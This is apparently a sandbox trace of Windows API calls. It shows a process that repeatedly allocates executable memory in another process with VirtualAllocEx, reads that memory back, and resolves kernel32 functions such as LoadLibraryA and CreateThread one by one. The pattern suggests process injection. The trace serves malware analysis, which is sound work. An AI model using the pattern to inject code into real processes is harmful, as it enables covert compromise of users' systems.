	[0197.845] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.846] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.846] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.846] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.846] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.846] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.846] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.846] lstrlenA (lpString="GetProcAddress") returned 14
	[0197.846] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.847] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.847] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.847] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.847] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.847] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.848] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.848] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.848] lstrlenA (lpString="lstrcpyA") returned 8
	[0197.848] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.848] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.849] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.849] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.849] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.849] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.849] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.849] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.849] lstrlenA (lpString="LoadLibraryA") returned 12
	[0197.849] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.850] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.850] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.850] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.850] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.850] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.851] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.851] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.851] lstrlenA (lpString="lstrcatA") returned 8
	[0197.851] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.852] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.852] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.852] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.852] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.852] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.852] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.852] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.853] lstrlenA (lpString="SetLastError") returned 12
	[0197.853] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.853] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.853] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.853] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.853] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.854] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.854] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.854] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.854] lstrlenA (lpString="VirtualQuery") returned 12
	[0197.854] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.855] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.855] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.855] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.855] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.855] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.856] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.856] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.856] lstrlenA (lpString="CreateThread") returned 12
	[0197.856] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.856] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.857] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.857] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.857] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.857] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.857] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.857] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.857] lstrlenA (lpString="Sleep") returned 5
	[0197.857] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.858] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.858] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.858] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.858] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.858] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.859] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.859] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.859] lstrlenA (lpString="GetCurrentDirectoryA") returned 20
	[0197.859] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.860] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.886] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.886] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.886] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.886] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.886] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.886] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.886] lstrlenA (lpString="SetCurrentDirectoryA") returned 20
	[0197.886] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.887] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.887] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.887] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.887] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.887] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.888] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.888] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.888] lstrlenA (lpString="SystemTimeToFileTime") returned 20
	[0197.888] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.888] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.889] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.889] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.889] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.889] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.889] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.889] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.889] lstrlenA (lpString="ReadConsoleW") returned 12
	[0197.889] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.890] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.890] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.890] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.890] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.890] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.891] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.891] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.891] lstrlenA (lpString="WriteConsoleW") returned 13
	[0197.891] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.891] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.892] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.892] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.892] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.892] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.892] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.892] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.892] lstrlenA (lpString="SetStdHandle") returned 12
	[0197.892] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.893] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.893] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.893] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.893] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.893] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.894] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.894] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.894] lstrlenA (lpString="SetEnvironmentVariableA") returned 23
	[0197.894] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.894] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.895] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.895] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.895] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.895] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.895] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.895] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.895] lstrlenA (lpString="FreeEnvironmentStringsW") returned 23
	[0197.895] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.896] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.896] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.896] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.896] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.896] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.897] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.897] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.897] lstrlenA (lpString="GetEnvironmentStringsW") returned 22
	[0197.897] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.897] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.898] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.898] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.898] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.898] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.898] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.898] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.898] lstrlenA (lpString="GetCommandLineW") returned 15
	[0197.898] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.899] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.899] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.899] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.899] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.899] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.900] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.900] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.900] lstrlenA (lpString="GetCommandLineA") returned 15
	[0197.900] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.900] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.900] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.901] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.901] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.901] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.901] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.901] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.901] lstrlenA (lpString="GetOEMCP") returned 8
	[0197.901] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.902] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.902] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.903] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.903] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.903] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.903] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.903] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.903] lstrlenA (lpString="IsValidCodePage") returned 15
	[0197.903] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.904] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.904] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.904] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.904] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.904] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.905] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.905] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.905] lstrlenA (lpString="EncodePointer") returned 13
	[0197.905] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.905] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.906] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.906] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.906] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.906] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.906] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.906] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.906] lstrlenA (lpString="DecodePointer") returned 13
	[0197.906] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.907] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.907] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.907] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.907] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.907] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.908] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.908] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.908] lstrlenA (lpString="GetCPInfo") returned 9
	[0197.908] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.909] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.909] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.909] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.909] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.909] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.909] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.909] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.909] lstrlenA (lpString="CompareStringW") returned 14
